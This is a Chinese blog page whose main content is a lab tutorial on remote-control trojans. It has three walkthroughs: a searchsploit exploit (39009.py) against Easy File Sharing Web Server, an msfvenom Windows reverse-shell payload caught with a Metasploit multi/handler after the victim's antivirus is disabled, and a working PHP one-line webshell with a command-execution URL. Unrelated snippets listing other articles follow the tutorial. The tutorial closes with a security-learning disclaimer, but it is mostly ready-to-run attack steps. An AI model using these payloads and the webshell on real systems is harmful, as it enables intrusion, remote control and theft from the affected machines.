news 2026/3/11 8:57:06

远程控制与木马攻防揭秘

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
远程控制与木马攻防揭秘

远程控制课程内容

一、Easy File Sharing Web Server 存在远程溢出

二、Kali中生成被控端

三、在网站中写入一句话木马

一、Easy File Sharing Web Server 存在远程溢出

复现步骤

打开Easy File Sharing Web Server,并开启端口为8000的网站

打开kali扫描对应ip地址

可以看见8000端口开放了Easy File Sharing Web Server http 6.9

说明目标主机已经运行了Easy File Sharing Web Server这个软件

接下来我们用searchsploit查Easy File Sharing

他能给出我们要用那些路径下的那些脚本

这里我们的Easy File Sharing Web Server是7.2版本的,所有我们用对应的脚本39009.py

他会打开目标主机的计算器

这样就完成了

二、Kali中生成被控端

复现步骤

打开kali,用msfvenom生成一个payload.exe

注意这里的被控端是windows系统,如果是安卓系统填android

lhost填你自己的kali的ip地址,lport填一个没被占用的端口就行

最后面的“/home/kali/payload.exe”是payload.exe文件生成时保存的路径,填一个你能找到的路径就好,最好不要放在“/root”路径下,有可能payload文件会取不出来

把生成的payload.exe发给被控端备用

被控端要把杀毒软件关闭,电脑自带的也要关闭

接着打开msfconsole界面

以此输入:

use exploit/multi/handler

set payload generic/shell_reverse_tcp

set lhost 192.168.79.134(输入你自己的IP地址)

set lport 7777(输入你的端口)

注意lhost和lport要和刚刚生成payload文件时的一致

最后输入exploit开始监听

现在被控端打开payload.exe

我们可以看看被控端的磁盘信息

这样就成功了

请不要乱输代码,否则被控端的信息可能会被损坏

输入exit退出

三、在网站中写入一句话木马

复现步骤

右键创建一个新文档,命名为shell.php

打开shell.php,写入一句话木马

<?php system($_REQUEST['cmd']);?>

保存后把shell.php放入“/var/www/html”路径下

开启apache

service apache2 start

现在可以去浏览器验证是否成功了

输入http://192.168.134/shell.php?cmd=ifconfig(IP地址是开启apache的主机的)

可以看到网页成功运行了ifconfig

本文仅用于网络安全学习,严禁用于非法攻击,违规使用后果自负。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/3/3 22:48:47

1小时搭建锁相环原型:快马平台实战

快速体验 打开 InsCode(快马)平台 https://www.inscode.net输入框内输入如下内容&#xff1a; 在快马平台上开发一个锁相环快速原型系统&#xff0c;要求&#xff1a;1. 支持参数化配置 2. 实时显示相位锁定过程 3. 输出关键性能指标 4. 生成可下载的Verilog/Python代码 5. 提…

作者头像 李华
网站建设 2026/3/5 5:22:10

java调用python零基础入门指南

快速体验 打开 InsCode(快马)平台 https://www.inscode.net输入框内输入如下内容&#xff1a; 开发一个java调用python学习应用&#xff0c;提供交互式教程和新手友好的界面。点击项目生成按钮&#xff0c;等待项目生成完整后预览效果 作为一名刚接触编程的新手&#xff0c;我…

作者头像 李华
网站建设 2026/3/10 19:14:40

Gpower CMS V9.0 以“信创+AI”双引擎助力智慧校园建设

引言 在数字化浪潮与国家信息技术应用创新&#xff08;信创&#xff09;战略的双重驱动下&#xff0c;高校信息化建设正步入以“自主可控、安全智能”为核心的新阶段。近期&#xff0c;通元软件与全国多所高校紧密合作&#xff0c;基于Gpower CMS V9.0 站群管理系统&#xff0c…

作者头像 李华
网站建设 2026/3/9 9:25:55

Ubuntu触发硬件级系统重启

Ubuntu触发硬件级系统重启1. 挂载系统服务2. 编写GPU状态监控3. 编写重启函数3.1 启用内核硬件重启许可3.2 执行硬重启函数4. 启用监控服务因为一些至今尚未搞明白的神奇原因&#xff0c;RTX5090的显卡时不时就会在跑AI推理的时候挂掉&#xff08;GPU lost&#xff09;&#xf…

作者头像 李华
网站建设 2026/3/10 21:16:40

花3小时剪的视频换首歌就废?因为你没懂这个

前段时间&#xff0c;我一个做自媒体的朋友跟我吐槽&#xff0c;说他花三小时剪好的视频&#xff0c;因为换了个背景音乐&#xff0c;整个音画同步全乱了&#xff0c;相当于白干。说实话&#xff0c;这种崩溃瞬间我太懂了——视频替换音频看似简单&#xff0c;但里面的门道还真…

作者头像 李华
网站建设 2026/3/1 18:48:27

1小时搭建Modbus TCP测试环境

快速体验 打开 InsCode(快马)平台 https://www.inscode.net输入框内输入如下内容&#xff1a; 开发一个Modbus TCP设备模拟器&#xff0c;功能包括&#xff1a;1. 模拟多个从设备&#xff1b;2. 自定义寄存器映射&#xff1b;3. 记录通信日志&#xff1b;4. 注入异常响应测试。…

作者头像 李华